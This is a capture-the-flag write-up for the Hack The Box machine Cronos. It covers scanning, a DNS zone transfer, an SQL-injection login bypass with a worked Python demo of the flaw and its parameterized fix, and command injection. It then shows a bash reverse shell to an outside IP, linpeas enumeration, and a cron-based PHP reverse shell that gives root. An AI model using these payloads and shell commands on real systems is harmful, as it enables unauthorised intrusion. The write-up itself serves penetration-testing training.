Hack The Box (HTB) Writeup - Cronos
Today we will solve Cronos, a Medium-difficulty box from Hack The Box (HTB). If you are new, HTB is an online practice lab for learning penetration testing. This box is helpful in preparing for the OSCP certification.
Summary:
- Run Nmap to find open ports and services
- Enumerate DNS
- Add IP and identified hostnames in /etc/hosts
- Enumerate HTTP
- Identify login on admin.cronos.htb
- Use SQL Injection to bypass login
- Check for Command Injection
- Get a reverse shell and locate the user.txt flag
- Transfer Linux privilege escalation scripts from the local machine to the low-privileged machine
- Results
- php reverse shell in crontab
- Reverse shell and locate root.txt
Start with Nmap
Initial Scan
nmap 10.10.10.13
Run default scripts
nmap -sC -sV 10.10.10.13
Scan all ports
nmap -p- 10.10.10.13
Run UDP scan
nmap -sU 10.10.10.13
Use the dig command to request a zone transfer and identify hostnames
dig axfr cronos.htb @10.10.10.13
Add the hostnames to /etc/hosts using nano /etc/hosts
Check admin.cronos.htb in the browser
Try SQL injection payloads; the login succeeds with the payload below
' or 1=1 limit 1 -- -+
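Why this payload gets past the login, and the parameterized fix, as an added example that is not part of the original writeup or the box's own code. It assumes the login page concatenates the username into its query and accepts when exactly one row matches; the table, accounts and function names are constructed, and SQLite stands in for the box's database.

```python
import hashlib
import sqlite3

PAGE_PAYLOAD = "' or 1=1 limit 1 -- -+"  # payload quoted in the writeup


def pw_hash(password):
    # Demo-only digest; a real application would use a salted KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Constructed sample data: two accounts in an in-memory database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", pw_hash("S3cret-admin")), ("alice", pw_hash("S3cret-alice"))],
    )
    return conn


def login_vulnerable(conn, username, password):
    # Assumed flaw: the username is concatenated into the SQL text, so a
    # quote closes the string and "--" comments out the password test.
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + pw_hash(password) + "'")
    rows = conn.execute(sql).fetchall()
    return len(rows) == 1  # assumed check: exactly one matching row


def login_parameterized(conn, username, password):
    # Hardened form: values are bound, so quotes and comments stay data.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    rows = conn.execute(sql, (username, pw_hash(password))).fetchall()
    return len(rows) == 1


def demo():
    conn = make_db()
    return {
        "vulnerable_payload": login_vulnerable(conn, PAGE_PAYLOAD, "x"),
        "parameterized_payload": login_parameterized(conn, PAGE_PAYLOAD, "x"),
        "parameterized_valid": login_parameterized(conn, "admin", "S3cret-admin"),
    }


if __name__ == "__main__":
    print(demo())
```

Under the assumed exactly-one-row check, the `limit 1` clause is what makes the always-true condition pass: without it the query matches every account and the count check rejects the login.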
Try command injection with the ls command. The output confirms that the web application is vulnerable to command injection.
Intercept the request in Burp Suite and use the command injection vulnerability to get a reverse shell.
bash -c 'bash -i >& /dev/tcp/10.10.14.16/8000 0>&1'
Got user.txt
Privilege escalation
Spawn a tty shell
python -c 'import pty; pty.spawn("/bin/sh")'
Run the commands below to identify the flavor of the box
uname -a
cat /proc/version
cat /etc/issue
Identify a privilege escalation script for Ubuntu 16.04.2. Download it on the local machine and then transfer it to the compromised machine.
Run the privilege escalation script
./linpeas.sh
Running linpeas.sh turned up /var/www/laravel/artisan
Check crontab
Download the php-reverse-shell.php script
Change the local IP and port number
To catch the reverse shell, start an nc listener and run the PHP script
Got a reverse shell
Got root.
Disclaimer: This tutorial is for educational purposes only. Each individual is solely responsible for any illegal act.